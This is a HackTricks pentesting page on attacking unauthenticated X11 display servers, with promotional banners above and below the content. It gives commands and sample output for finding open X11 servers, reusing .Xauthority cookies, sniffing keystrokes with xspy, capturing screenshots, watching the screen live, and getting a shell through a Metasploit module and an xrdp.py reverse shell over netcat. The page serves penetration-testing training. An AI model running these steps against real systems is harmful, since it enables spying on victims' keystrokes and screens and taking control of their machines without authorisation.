hacktricks/network-services-pentesting/6000-pentesting-x11.md

6000 - Pentesting X11

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
• Discover The PEASS Family, our collection of exclusive NFTs
• Get the official PEASS & HackTricks swag
• Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
• Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.

HackenProof is home to all crypto bug bounties.

Get rewarded without delays
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.

Get experience in web3 pentesting
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.

Become the web3 hacker legend
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.

Sign up on HackenProof start earning from your hacks!

{% embed url="https://hackenproof.com/register" %}

Basic Information

The X Window System (aka X) is a windowing system for bitmap displays, which is common on UNIX-based operating systems. X provides the basic framework for a GUI based environment. X also does not mandate the user interface – individual programs handle this.
From: https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref

Default port: 6000

PORT       STATE   SERVICE
6000/tcp   open    X11

Enumeration

Check for anonymous connection:

nmap -sV --script x11-access -p <PORT> <IP>
msf> use auxiliary/scanner/x11/open_x11

Local Enumeration

The file .Xauthority in the users home folder is used by X11 for authorization. From here:

MIT-magic-cookie-1: Generating 128bit of key (“cookie”), storing it in ~/.Xauthority (or where XAUTHORITY envvar points to). The client sends it to server plain! the server checks whether it has a copy of this “cookie” and if so, the connection is permitted. the key is generated by DMX.

{% hint style="warning" %} In order to use the cookie you should set the env var: export XAUTHORITY=/path/to/.Xauthority {% endhint %}

Verfy Connection

xdpyinfo -display <ip>:<display>
xwininfo -root -tree -display <IP>:<display> #Ex: xwininfo -root -tree -display 10.5.5.12:0

Keyloggin

xspy to sniff the keyboard keystrokes.

Sample Output:

xspy 10.9.xx.xx

opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab

Screenshots capturing

xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
convert screenshot.xwd screenshot.png

Remote Desktop View

Way from: https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref

./xrdp.py <IP:0>

Way from: https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html

First we need to find the ID of the window using xwininfo

xwininfo -root -display 10.9.xx.xx:0

xwininfo: Window id: 0x45 (the root window) (has no name)

Absolute upper-left X:  0
Absolute upper-left Y:  0
Relative upper-left X:  0
Relative upper-left Y:  0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners:  +0+0  -0+0  -0-0  +0-0
-geometry 1024x768+0+0

XWatchwin

For live viewing we need to use

./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9.xx.xx:0 -w 0x45

Get Shell

msf> use exploit/unix/x11/x11_keyboard_exec

Other way:

Reverse Shell: Xrdp also allows to take reverse shell via Netcat. Type in the following command:

./xrdp.py <IP:0> –no-disp

It will prompt a new control pane where we can see the R-shell option, which is illustrated below:

We will start the Netcat listening mode in our local system on port 5555, which is illustrated below:

Then add the IP and port and then select R-Shell, which is illustrated below:

Now as can be seen below we have complete system access:

{% embed url="https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref" %}

Shodan

• port:6000 x11

HackenProof is home to all crypto bug bounties.

Get rewarded without delays
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.

Get experience in web3 pentesting
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.

Become the web3 hacker legend
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.

Sign up on HackenProof start earning from your hacks!

{% embed url="https://hackenproof.com/register" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
• Discover The PEASS Family, our collection of exclusive NFTs
• Get the official PEASS & HackTricks swag
• Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
• Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.